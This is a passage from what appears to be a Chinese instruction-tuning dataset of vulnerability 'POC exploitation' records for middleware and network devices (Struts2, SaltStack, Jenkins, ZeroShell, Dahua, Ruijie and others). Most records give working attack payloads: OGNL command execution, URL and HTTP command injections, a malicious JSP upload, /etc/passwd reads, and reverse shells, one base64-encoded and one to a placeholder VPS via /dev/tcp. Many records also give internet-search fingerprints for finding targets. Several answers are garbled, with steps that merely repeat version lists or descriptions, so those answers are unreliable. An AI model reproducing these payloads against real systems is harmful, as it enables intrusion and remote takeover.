\"useEarliestOffset\":true,\n            \"inputFormat\":{\n                \"type\":\"regex\",\n                \"pattern\":\"([\\\\s\\\\S]*)\",\n                \"listDelimiter\":\"56616469-6de2-9da4-efb8-8f416e6e6965\",\n                \"columns\":[\n                    \"raw\"\n                ]\n            }\n        },\n        \"dataSchema\":{\n            \"dataSource\":\"sample\",\n            \"timestampSpec\":{\n                \"column\":\"!!!_no_such_column_!!!\",\n                \"missingValue\":\"1970-01-01T00:00:00Z\"\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"granularitySpec\":{\n                \"rollup\":false\n            }\n        },\n        \"tuningConfig\":{\n            \"type\":\"kafka\"\n        }\n    },\n    \"samplerConfig\":{\n        \"numRows\":500,\n        \"timeoutMs\":15000\n    }\n}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Kafka Clients LDAP注入漏洞 CVE-2023-25194.md"}
    283. 

  283. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nginx 配置错误漏洞\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. location / {\n    return 302 https://$host$uri;\n}\n3. location /files {\n    alias /home/;\n}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Nginx 配置错误漏洞.md"}
    284. 

  284. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:SaltStack Minion 命令注入漏洞 CVE-2021-31607\n漏洞描述:2021年4月28日,深信服安全团队监测到一则Salt组件存在 SaltStack Minion 命令注入漏洞的信息,漏洞编号:CVE-2021-31607,漏洞威胁等级:中危。 该漏洞是由于在SaltStack Salt 2016.9至3002.6中,快照程序模块中存在一个命令注入漏洞,攻击者可利用该漏洞获得权限的情况下,对一个分支系统的本地特权进行升级。 参考阅读: * https://sec.stealthcopter.com/saltstack-snapper-minion-privledge-escaltion/ * https://nvd.nist.gov/vuln/detail/CVE-2021-31607 * https://nox.qianxin.com/vulnerability/detail/97347\n影响版本:``` 2016.9 ≤ SaltStack Salt ≤ 3002.6 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-31607\n【POC利用方法】\n1. 2016.9 ≤ SaltStack Salt ≤ 3002.6\n2. echo hi > '$(touch HACKED).txt'\n反弹shell:\necho hi > '$(echo bmMgLWUgL2Jpbi9iYXNoIDEyNy4wLjAuMSA0NDQ0|base64 -d|sh -i).txt'\n3. * https://nox.qianxin.com/vulnerability/detail/97347\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/SaltStack Minion 命令注入漏洞 CVE-2021-31607.md"}
    285. 

  285. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache HTTPd 换行解析漏洞 CVE-2017-15715\n漏洞描述:Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,`1.php\\x0A`将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。\n影响版本:``` Apache HTTPd  2.4.0~2.4.29版本 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-15715\n【POC利用方法】\n1. Apache HTTPd  2.4.0~2.4.29版本\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/httpd/CVE-2017-15715\ndocker-compose up -d\n3. http://192.168.174.128:8080/shell.php%0a\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache HTTPd 换行解析漏洞 CVE-2017-15715.md"}
    286. 

  286. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Saltstack 远程命令执行漏洞 CVE-2020-11651 11652\n漏洞描述:SaltStack 是基于 Python 开发的一套C/S架构配置管理工具。国外某安全团队披露了 SaltStack 存在认证绕过漏洞(CVE-2020-11651)和目录遍历漏洞(CVE-2020-11652)。 在 CVE-2020-11651 认证绕过漏洞中,攻击者通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞。 在 CVE-2020-11652 目录遍历漏洞中,攻击者通过构造恶意请求,可以读取、写入服务器上任意文件。 参考阅读: - https://www.cdxy.me/?p=822\n影响版本:``` SaltStack Version < 2019.2.4 SaltStack Version < 3000.2 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-11651\n【POC利用方法】\n1. SaltStack Version < 2019.2.4\nSaltStack Version < 3000.2\n2. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/saltstack/CVE-2020-11652\ndocker-compose up -d\n3. auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load)\nauth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key)\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Saltstack 远程命令执行漏洞 CVE-2020-11651 11652.md"}
    287. 

  287. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jetty WEB-INF 敏感信息泄露漏洞 CVE-2021-34429\n漏洞描述:Eclipse Jetty 是一个 Java Web 服务器和 Java Servlet 容器。 Jetty 9.4.40 修复了一个模糊路径信息泄露漏洞[CVE-2021-28164](https://github.com/vulhub/vulhub/tree/master/jetty/CVE-2021-28164),CVE-2021-34429 是它的变种和绕过。 有 3 种类型的有效载荷可以泄露以下内容`WEB-INF/web.xml`: - 基于 Unicode 的 URL 编码:`/%u002e/WEB-INF/web.xml` - `\\0`有`.`错误:`/.%00/WEB-INF/web.xml` - `\\0`有`..`错误:`/a/b/..%00/WEB-INF/web.xml` 参考: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm - https://xz.aliyun.com/t/10039\n影响版本:``` 9.4.37 ≤ Eclipse Jetty ≤ 9.4.42 10.0.1 ≤ Eclipse Jetty ≤ 10.0.5 11.0.1 ≤ Eclipse Jetty ≤ 11.0.5 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-34429\n【POC利用方法】\n1. 9.4.37 ≤ Eclipse Jetty ≤ 9.4.42\n10.0.1 ≤ Eclipse Jetty ≤ 10.0.5\n11.0.1 ≤ Eclipse Jetty ≤ 11.0.5\n2. docker-compose up -d\n3. 服务器启动后,访问`http://your-ip:8080`查看示例页面。\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Jetty WEB-INF 敏感信息泄露漏洞 CVE-2021-34429.md"}
    288. 

  288. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache HTTPd 多后缀解析漏洞\n漏洞描述:Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件: ``` AddType text/html .html AddLanguage zh-CN .cn ``` 其给`.html`后缀增加了media-type,值为`text/html`;给`.cn`后缀增加了语言,值为`zh-CN`。此时,如果用户请求文件`index.cn.html`,他将返回一个中文的html页面。 以上就是Apache多后缀的特性。如果运维人员给`.php`后缀增加了处理器: ``` AddHandler application/x-httpd-php .php ``` 那么,在有多个后缀的情况下,只要一个文件含有`.php`后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. AddType text/html .html\nAddLanguage zh-CN .cn\n2. AddHandler application/x-httpd-php .php\n3. docker-compose up -d\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache HTTPd 多后缀解析漏洞.md"}
    289. 

  289. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:GoAhead Server 远程命令执行漏洞 CVE-2017-17562\n漏洞描述:GoAhead是一个开源(商业许可)、简单、轻巧、功能强大、可以在多个平台运行的Web Server,多用于嵌入式系统、智能设备。其支持运行ASP、Javascript和标准的CGI程序,这个漏洞就出现在运行CGI程序的时候。 GoAhead在接收到请求后,将会从URL参数中取出键和值注册进CGI程序的环境变量,且只过滤了`REMOTE_HOST`和`HTTP_AUTHORIZATION`。我们能够控制环境变量,就有很多攻击方式。比如在Linux中,`LD_`开头的环境变量和动态链接库有关,如`LD_PRELOAD`中指定的动态链接库,将会被自动加载;`LD_LIBRARY_PATH`指定的路径,程序会去其中寻找动态链接库。 我们可以指定`LD_PRELOAD=/proc/self/fd/0`,因为`/proc/self/fd/0`是标准输入,而在CGI程序中,POST数据流即为标准输入流。我们编译一个动态链接库,将其放在POST Body中,发送给`http://target/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0`,CGI就会加载我们发送的动态链接库,造成远程命令执行漏洞。 参考链接: - https://www.elttam.com.au/blog/goahead/\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-17562\n【POC利用方法】\n1. docker-compose up -d\n2. git clone https://github.com/embedthis/goahead.git\ncd goahead\ngit checkout tags/v3.6.4 \nmake #编译GoAhead\ncd test # 要进到test目录下运行,其它目录下没有self.key等文件会报错\ngcc ./cgitest.c -o cgi-bin/cgitest #编译用来测试的CGI文件\nsudo ../build/linux-x64-default/bin/goahead #运行GoAhead Web服务器\n3. $ curl http://172.16.217.185:80/cgi-bin/cgitest\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/GoAhead Server 远程命令执行漏洞 CVE-2017-17562.md"}
    290. 

  290. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jenkins 远程代码执行漏洞 CVE-2019-1003000\n漏洞描述:Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成. 该漏洞存在于`Declarative Plugin 1.3.4.1`之前的版本, `Groovy Plugin 2.61.1`之前的版本以及`Script Security Plugin 1.50`之前的版本。该漏洞通过将AST转换注释(如@Grab)应用于源代码元素,可以在脚本编译阶段避免脚本安全沙箱保护。所以会造成具有`Overall/Read`权限的用户或能够控制SCM中的`Jenkinsfile`或者`sandboxed Pipeline`共享库内容的用户可以绕过沙盒保护并在Jenkins主服务器上执行任意代码。\n影响版本:``` Declarative Plugin < 1.3.4.1 Groovy Plugin < 2.61.1 Script Security Plugin < 1.50 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2019-1003000\n【POC利用方法】\n1. Declarative Plugin < 1.3.4.1\nGroovy Plugin < 2.61.1\nScript Security Plugin < 1.50\n2. # activate py27\npython exploit.py --url http://eci-2ze1x17tl0kujrg3c5ey.cloudeci1.ichunqiu.com:8080 --job my-pipeline --username user1 --password user1 --cmd \"cat /etc/passwd\"\n\n# --cmd \"bash -i >& /dev/tcp/<YOUR-VPS-IP>/<YOUR-VPS-PORT> 0>&1\"\n3. python exploit.py --url http://jenkins-site.com --job job_name --username your_user --password your_passwd --cmd \"cat /etc/passwd\"\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Jenkins 远程代码执行漏洞 CVE-2019-1003000.md"}
    291. 

  291. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache ActiveMQ OpenWire 协议反序列化命令执行漏洞 CVE-2023-46604\n漏洞描述:Apache ActiveMQ 是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。在Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。 参考链接: - [https://activemq.apache.org/news/cve-2023-46604](https://activemq.apache.org/news/cve-2023-46604) - [https://xz.aliyun.com/t/12929](https://xz.aliyun.com/t/12929) - [https://boogipop.com/2023/11/03/Apache%20ActiveMQ%20CVE-2023-46604%20RCE%20%E5%88%86%E6%9E%90/](https://boogipop.com/2023/11/03/Apache%20ActiveMQ%20CVE-2023-46604%20RCE%20%E5%88%86%E6%9E%90/) - [https://forum.butian.net/share/2566](https://forum.butian.net/share/2566)\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2023-46604\n【POC利用方法】\n1. docker compose up -d\n2. python3 -m http.server 6666\n3. python3 poc.py your-ip 61616 http://your-server/poc.xml\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache ActiveMQ OpenWire 协议反序列化命令执行漏洞 CVE-2023-46604.md"}
    292. 

  292. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache ActiveMQ Console 控制台默认弱口令\n漏洞描述:Apache ActiveMQ Console 存在默认弱口令 admin:admin,进入控制台后可被进一步恶意利用\n影响版本:``` Apache ActiveMQ ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. Apache ActiveMQ\n2. 访问目标: http://xxx.xxx.xxx.xxx:8161/admin\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache ActiveMQ Console 控制台默认弱口令.md"}
    293. 

  293. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-013 远程代码执行漏洞\n漏洞描述:Struts2 标签中 `<s:a>` 和 `<s:url>` 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: 1. none - 链接不包含请求的任意参数值(默认) 2. get - 链接只包含 GET 请求中的参数和其值 3. all - 链接包含 GET 和 POST 所有参数和其值 `<s:a>`用来显示一个超链接,当`includeParams=all`的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。在放置参数的过程中会将参数进行OGNL渲染,造成任意命令执行漏洞。 漏洞详情: - http://struts.apache.org/docs/s2-013.html - http://struts.apache.org/docs/s2-014.html\n影响版本:影响版本: 2.0.0 - 2.3.14.1\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. ${(#_memberAccess[\"allowStaticMethodAccess\"]=true,#a=@java.lang.Runtime@getRuntime().exec('id').getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[50000],#c.read(#d),#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#out.println(#d),#out.close())}\n\n// 或\n\n${#_memberAccess[\"allowStaticMethodAccess\"]=true,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}\n3. http://your-vps-ip:8080/link.action?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('id').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println('dbapp%3D'%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-013 远程代码执行漏洞.md"}
    294. 

  294. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Milesight Router httpd.log 信息泄漏漏洞 CVE-2023-4714\n漏洞描述:Milesight Router 存在信息泄漏漏洞,攻击者通过访问httpd.log可以获取登陆敏感日志信息\n影响版本:Milesight Router\n网络测绘:``` \"rt_title\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2023-4714\n【POC利用方法】\n1. /lang/log/httpd.log\n2. /lang/log/httpd.log\n3. Milesight Router 存在信息泄漏漏洞,攻击者通过访问httpd.log可以获取登陆敏感日志信息\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Milesight Router httpd.log 信息泄漏漏洞 CVE-2023-4714.md"}
    295. 

  295. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:大华 ICC智能物联综合管理平台 readPic 任意文件读取漏洞\n漏洞描述:大化 ICC智能物联综合管理平台 readPic 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感文件\n影响版本:大华 ICC智能物联综合管理平台\n网络测绘:``` body=\"*客户端会小于800*\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. body=\"*客户端会小于800*\"\n2. /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/大华 ICC智能物联综合管理平台 readPic 任意文件读取漏洞.md"}
    296. 

  296. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725\n漏洞描述:ZeroShell 3.9.0 存在命令执行漏洞,/cgi-bin/kerbynet 页面,x509type 参数过滤不严格,导致攻击者可执行任意命令\n影响版本:``` ZeroShell < 3.9.0 ```\n网络测绘:``` app=\"Zeroshell-防火墙\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2019-12725\n【POC利用方法】\n1. ZeroShell < 3.9.0\n2. app=\"Zeroshell-防火墙\"\n3. /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/ZeroShell 3.9.0 远程命令执行漏洞 CVE-2019-12725.md"}
    297. 

  297. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞\n漏洞描述:思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。思福迪运维安全管理系统 test_qrcode_b 路由存在命令执行漏洞。\n影响版本:思福迪 运维安全管理系统\n网络测绘:``` app=\"思福迪-LOGBASE\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"思福迪-LOGBASE\"\n2. POST /bhost/test_qrcode_b HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\nContent-Length: 23\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nReferer: http://xxx.xxx.xxx.xxx\nAccept-Encoding: gzip\n\nz1=1&z2=\"|id;\"&z3=bhost\n3. User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/思福迪 运维安全管理系统 test_qrcode_b 远程命令执行漏洞.md"}
    298. 

  298. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:博华网龙防火墙 cmd.php 远程命令执行漏洞\n漏洞描述:博华网龙防火墙 cmd.php 过滤不足,导致命令拼接执行远程命令\n影响版本:``` 博华网龙防火墙 ```\n网络测绘:``` \"博华网龙防火墙\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. <?php\n    include_once(\"pub/pub.inc\");\n    include_once(\"pub/session.inc\");\n    \n    $username = $_SESSION[\"USER_NAME\"];\n    checkApproachUrl(); \n    \n  if($_GET['action'] == \"ping\")\n  {\n        $host = $_GET['host'];\n        $count = $_GET['count'];\n        system(\"/bin/ping -c $count \" . escapeshellarg($host).\" >temp.htm\");\n        \n         if($username)\n            pSyslog(\"ping $host $count次\", 0);           \n  }\n  else if($_GET['action'] == \"traceroute\")\n  {\n        $host = $_GET['host'];\n        $ttl =  $_GET['ttl'];\n        $useicmp = $_GET['useicmp'];\n        \n        if($useicmp)\n            $useicmp = \"-I\";\n        else\n            $useicmp = \"\";        \n        system(\"/usr/bin/traceroute -d $useicmp -w 2 -m \" . escapeshellarg($ttl) . \" \" . escapeshellarg($host).\" >temp.htm\");    \n        if($username)\n            pSyslog(\"traceroute $host 跳数为$ttl\", 0);     \n  }\n  else if($_GET['action'] == \"arping\")\n  {\n    $host = $_GET['host'];\n    $count = $_GET['count'];\n    $if = $_GET['ifName'];\n    $src = $_GET['src'];\n    system(\"/usr/bin/arping -I $if -c $count -s $src $host >temp.htm\");\n    \n     if($username)\n        pSyslog(\"arping $host $count次\", 0);\n  }\n  else\n  {\n    system(\"echo \\\"\\\" >temp.htm\");\n  } \n?>\n2. /diagnostics/cmd.php?action=ping&count=||id||\n/diagnostics/cmd.php?action=arping&ifName=|cat /etc/passwd||\n3. if($_GET['action'] == \"ping\")\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/博华网龙防火墙 cmd.php 远程命令执行漏洞.md"}
    299. 

  299. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐捷 EG易网关 管理员账号密码泄露漏洞\n漏洞描述:锐捷EG易网关 login.php存在 CLI命令注入,导致管理员账号密码泄露漏洞\n影响版本:``` 锐捷EG易网关 ```\n网络测绘:``` app=\"Ruijie-EG易网关\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"Ruijie-EG易网关\"\n2. <?php\n\n/**\n * 用户登录处理\n */\ndefine('IN', true);     //定位该文件是入口文件\ndefine('DS', DIRECTORY_SEPARATOR);\ndefine('AROOT', dirname(__FILE__) . DS);\n\nclass defaultController {\n\n    function __construct() {\n        \n    }\n\n    /**\n     * 登录处理\n     */\n    public function indexAction() {\n$username = p(\"username\");$password = p(\"password\");$data = [];\n$reg='/(\\r|\\n)+/';\nif (count(preg_split($reg, $username)) > 1 || count(preg_split($reg, $password)) > 1) {\n$data[\"status\"] = 6;\n$data[\"msg\"] = \"username or password can't exist '\\r\\n'\";\njson_echo($data);\nexit();\n}\n        if ($username == FALSE || $password == FALSE) {\n            $data[\"status\"] = 5;\n            $data[\"msg\"] = \"username or password can't empty\";\n            json_echo($data);\n            exit();\n        }\n        $res = execCli(\"exec\", \"webmaster $username $password\");\n        if ($res[\"status\"] != 1) {\n            json_echo($res);\n            exit();\n        }\n        $isSuccess = trim($res[\"data\"]);\n        if ($isSuccess == 0) {    //用户名、账号验证成功\n            session_start();\n            $_SESSION['username'] = $username;  //记录用户名\n            $_SESSION[\"lasttime\"] = time();    //记录登录时间\n            $config = @file_get_contents(DS . \"data\" . DS . \"web.config\");    //获取web配置信息\n            if ($config != false) {\n                $config = unserialize($config);\n                $_SESSION[\"timeout\"] = isset($config[\"loginTimeout\"]) ? $config[\"loginTimeout\"] * 60 : c(\"timeout\");\n            } else {\n                $_SESSION[\"timeout\"] = c(\"timeout\");\n            }\n            setcookie(\"user\", $_SESSION['username']);\n        }\n        $res[\"data\"] = $isSuccess;\n        json_echo($res);\n    }\n\n    /**\n     * 获取设备信息\n     */\n    function versionAction() {\n        $info = $version = execCli(\"exec\", \"show version detail\", \"\");\n        $info[\"data\"] = preg_split(\"/\\r*\\n/\", $info[\"data\"]);\n        json_echo($info);\n    }\n\n}\n\ninclude_once(AROOT . \"init.php\");    //mvc初始化入口,放在底部\n3. if ($username == FALSE || $password == FALSE) {\n            $data[\"status\"] = 5;\n            $data[\"msg\"] = \"username or password can't empty\";\n            json_echo($data);\n            exit();\n        }\n        $res = execCli(\"exec\", \"webmaster $username $password\");\n        if ($res[\"status\"] != 1) {\n            json_echo($res);\n            exit();\n        }\n        $isSuccess = trim($res[\"data\"]);\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/锐捷 EG易网关 管理员账号密码泄露漏洞.md"}
    300. 

  300. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:大华 智慧园区综合管理平台 video 任意文件上传漏洞\n漏洞描述:大华 智慧园区综合管理平台 video 接口存在任意文件上传漏洞,攻击者通过漏洞可以上传任意文件到服务器中,控制服务器权限\n影响版本:大华 智慧园区综合管理平台\n网络测绘:``` app=\"dahua-智慧园区综合管理平台\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"dahua-智慧园区综合管理平台\"\n2. POST /publishing/publishing/material/file/video HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\nContent-Length: 804\nContent-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7\nAccept-Encoding: gzip, deflate\nConnection: close\n\n--dd8f988919484abab3816881c55272a7\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"Test.jsp\"\n\nTest\n--dd8f988919484abab3816881c55272a7\nContent-Disposition: form-data; name=\"Submit\"\n\nsubmit\n--dd8f988919484abab3816881c55272a7--\n3. /publishingImg/VIDEO/230812152005170200.jsp\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/大华 智慧园区综合管理平台 video 任意文件上传漏洞.md"}
    301. 

  301. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Kyan 网络监控设备 module.php 远程命令执行漏洞\n漏洞描述:Kyan 网络监控设备 module.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,可以获取服务器权限,存在远程命令执行漏洞\n影响版本:``` Kyan ```\n网络测绘:``` app=\"Kyan设计\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"Kyan设计\"\n2. <?php\nrequire_once 'config.php';\nrequire_once 'functions.php';\nrequire_once 'international.php';\nsession_start();\nauth_check();\n\n$BASH = \"\";\nif (is_windows()) {\n\t$BASH = \"c:\\\\cygwin\\\\bin\\\\bash --login -c \";\n\t$PREFIX = \"/cygdrive/z/writable/\";\n\t$PREFIX2 = \"/cygdrive/z/\";\n} else {\n\t$BASH = \"/bin/bashsuid -p -c \";\n\t$PREFIX = \"/config/\";\n\t$PREFIX2 = \"/\";\n}\n$encrypt_key = 'enc@leadmeet';\nif ($_SERVER['REQUEST_METHOD'] == 'POST') {\n\tif (!isset($_FILES['fileupload'])) {\n\t\tshow_error(lang_get('no file specified'));\n\t\texit;\n\t}\n\tif ($_FILES['fileupload']['size'] == 0) {\n\t\tshow_error(lang_get('file size is zero'));\n\t\texit;\n\t}\n\t$fileupload = $_FILES['fileupload'];\n\t$destdir = $PREFIX.'pkgs';\n\t$pkg_extract_dir = $PREFIX2.'pkgs';\n\t$tmpname = $fileupload['tmp_name'];\n\tif (is_windows()) {\n\t\t$bn = basename($tmpname);\n\t\t$command = \"move /Y \\\"\". $tmpname . \"\\\" c:\\\\cygwin\\\\dev\\\\shm\\\\\" . $bn;\n\t\tshell_exec($command);\n\t\t$tmpname = \"/dev/shm/\" . $bn;\n\t}\n\tshell_exec($BASH.\"\\\"mkdir -p /dev/shm/upload && chmod -R 777 /dev/shm/ \\\"\");\n\texec($BASH.\"\\\"cd /dev/shm/upload && ( bzcat \" . $tmpname . \" | openssl bf-cbc -d -k \" . $encrypt_key . \" | cpio -idu )\\\"\", $output, $ret);\n\tif($ret <> 0)\n\t{\n\t\tshow_error(lang_get('Extract file failed'));\n\t\texec($BASH.\"\\\"rm -rf /dev/shm/upload\\\"\");\n\t\texit;\n\t}\n\texec($BASH.\"\\\"cd /dev/shm/upload && md5sum -c md5sum\\\"\", $output, $ret);\n\tif($ret <> 0)\n\t{\n\t\tshow_error(lang_get('MD5 check failed'));\n\t\texec($BASH.\"\\\"rm -rf /dev/shm/upload\\\"\");\n\t\texit;\n\t}\n\tif (is_windows())\n\t\t$dh = opendir('c:\\\\cygwin\\\\dev\\\\shm\\\\upload');\n\telse\n\t\t$dh = opendir('/dev/shm/upload');\n\tif(!$dh)\n\t{\n\t\tshow_error(lang_get('can not open dest dir to copy'));\n\t\texec($BASH.\"\\\"rm -rf /dev/shm/upload\\\"\");\n\t\texit;\n\t}\n\texec($BASH.\"\\\"touch /tmp/mmap_watch_pause\\\"\");\n\twhile($file = readdir($dh))\n\t{\n\t\tif(is_dir($file)) continue;\n\t\t$file = trim($file);\n\t\tif(ereg('\\.pkg$', $file))\n\t\t{\n\t\t\t$filetitle = basename($file, '.pkg');\n\t\t\t$extract_dir = $pkg_extract_dir  . '/' . $filetitle;\n\t\t\texec($BASH.\"\\\"\" . $extract_dir . \"/.init stop\\\"\");\n\t\t\texec($BASH.\"\\\"mkdir -p \" . $destdir . \" && mv -f /dev/shm/upload/\" . $file . \" \" . $destdir . \"\\\"\");\n\t\t\texec($BASH.\"\\\"rm -rf \" . $extract_dir . \" && mkdir -p \" . $extract_dir . \" && cd \" . $extract_dir . \" && bzcat \" . $destdir . '/' . $file . \" | cpio -idu \\\"\");\n\t\t}\n\t}\n\tif (!is_windows())\n\t\texec($BASH.\"\\\"/sbin/ldconfig\\\"\");\n\telse\n\t\texec($BASH.\"\\\"rm -rf \". $tmpname .\"\\\"\");\n\texec($BASH.\"\\\"rm -f 